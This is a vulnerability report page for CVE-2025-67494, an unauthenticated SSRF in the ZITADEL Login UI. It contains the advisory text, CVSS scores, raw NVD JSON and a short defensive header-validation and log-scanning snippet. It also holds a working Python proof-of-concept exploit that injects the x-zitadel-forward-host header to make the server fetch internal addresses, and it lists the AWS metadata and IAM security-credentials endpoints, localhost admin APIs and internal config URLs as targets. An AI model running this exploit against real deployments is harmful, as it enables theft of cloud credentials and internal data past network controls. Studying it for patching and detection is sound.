Security Vulnerability Report
CVE-2025-67494 CVSS 9.3 CRITICAL

CVE-2025-67494

Published: 2025-12-09 22:16:16
Last Modified: 2025-12-19 18:53:35

Description

ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1.
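The root cause described above is that a request header is trusted as the host to fetch from. As an added defensive illustration (not ZITADEL's code and not its 4.7.1 fix), the following Python accepts a forwarded-host value only if it matches an explicit allowlist and is not an internal IP literal, and runs the same check over constructed access-log lines to surface abuse attempts. ALLOWED_HOSTS, the fwd_host= log field and the sample lines are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of the public hostnames this deployment actually serves.
ALLOWED_HOSTS = {"login.example.com", "auth.example.com"}

def extract_host(value):
    """Return the bare, lower-cased host from a value that may carry a scheme, port or path."""
    value = value.strip()
    if "://" not in value:
        value = "//" + value  # let urlsplit treat a bare host[:port][/path] as a netloc
    return (urlsplit(value).hostname or "").lower()

def is_internal_address(host):
    """True if host is an IP literal in a loopback, private, link-local or reserved range."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; the allowlist decides
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved or ip.is_unspecified

def validate_forward_host(header_value):
    """Return (accepted, reason); only exact allowlist matches are accepted."""
    host = extract_host(header_value)
    if not host:
        return False, "empty host"
    if is_internal_address(host):
        return False, "internal address"
    if host not in ALLOWED_HOSTS:
        return False, "not in allowlist"
    return True, "allowlisted"

# Constructed access-log lines (not from any real deployment); fwd_host is an assumed field name.
SAMPLE_LOG = """\
ts=2025-12-10T08:00:01Z path=/login fwd_host=login.example.com status=200
ts=2025-12-10T08:00:02Z path=/login fwd_host=169.254.169.254 status=200
ts=2025-12-10T08:00:03Z path=/login fwd_host=- status=200
ts=2025-12-10T08:00:04Z path=/login fwd_host=http://10.0.0.5:8080/admin status=200
"""
def suspicious_forward_hosts(log_text):
    """Return (value, reason) for every logged fwd_host value the validator rejects."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"fwd_host=(\S+)", line)
        if m and m.group(1) != "-":
            accepted, reason = validate_forward_host(m.group(1))
            if not accepted:
                hits.append((m.group(1), reason))
    return hits
```

Any rejected value from a client-supplied header is a signal worth alerting on, since a legitimate proxy only ever forwards the hostnames the deployment serves.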

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
ZITADEL <= 4.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-67494 PoC - ZITADEL Unauthenticated Full-Read SSRF
# Target: ZITADEL instances <= v4.7.0


def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF by injecting x-zitadel-forward-host header

    Args:
        target_url: ZITADEL login page URL (e.g., https://vulnerable-zitadel.com/login)
        internal_target: Internal service URL to target (e.g., http://169.254.169.254/latest/meta-data/)
    """
    headers = {
        'x-zitadel-forward-host': internal_target,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        print(f'[*] Sending SSRF request to: {target_url}')
        print(f'[*] Targeting internal resource: {internal_target}')

        response = requests.get(target_url, headers=headers, timeout=10, verify=False)

        print(f'[+] Status Code: {response.status_code}')
        print(f'[+] Response Length: {len(response.text)} bytes')
        print('\n[+] Response Content:')
        print(response.text[:2000])  # Print first 2000 chars

        return response.text

    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return None


def check_common_targets(target_url):
    """Check common SSRF targets"""
    targets = [
        ('AWS Metadata', 'http://169.254.169.254/latest/meta-data/'),
        ('AWS IAM', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'),
        ('Internal API', 'http://localhost:8080/admin/api'),
        ('Internal Health', 'http://127.0.0.1:80/health'),
        ('Internal Config', 'http://internal.corp.local:8080/config')
    ]

    print(f'[*] Testing common SSRF targets against {target_url}\n')

    for name, url in targets:
        print(f'\n[*] Testing {name}: {url}')
        exploit_ssrf(target_url, url)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-67494.py <target_url> [internal_url]')
        print('Example: python cve-2025-67494.py https://zitadel.company.com/login')
        print('Example: python cve-2025-67494.py https://zitadel.company.com/login http://169.254.169.254/latest/meta-data/')
        sys.exit(1)

    target = sys.argv[1]

    if len(sys.argv) >= 3:
        exploit_ssrf(target, sys.argv[2])
    else:
        check_common_targets(target)
```

References

https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96 - Patch
https://github.com/zitadel/zitadel/security/advisories/GHSA-7wfc-4796-gmg5 - Vendor Advisory
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67494",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T22:16:16.187",
    "lastModified": "2025-12-19T18:53:34.883",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.7.1",
                "matchCriteriaId": "E1B051D6-969F-4B70-BF3F-AFD77FB00251"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-7wfc-4796-gmg5",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```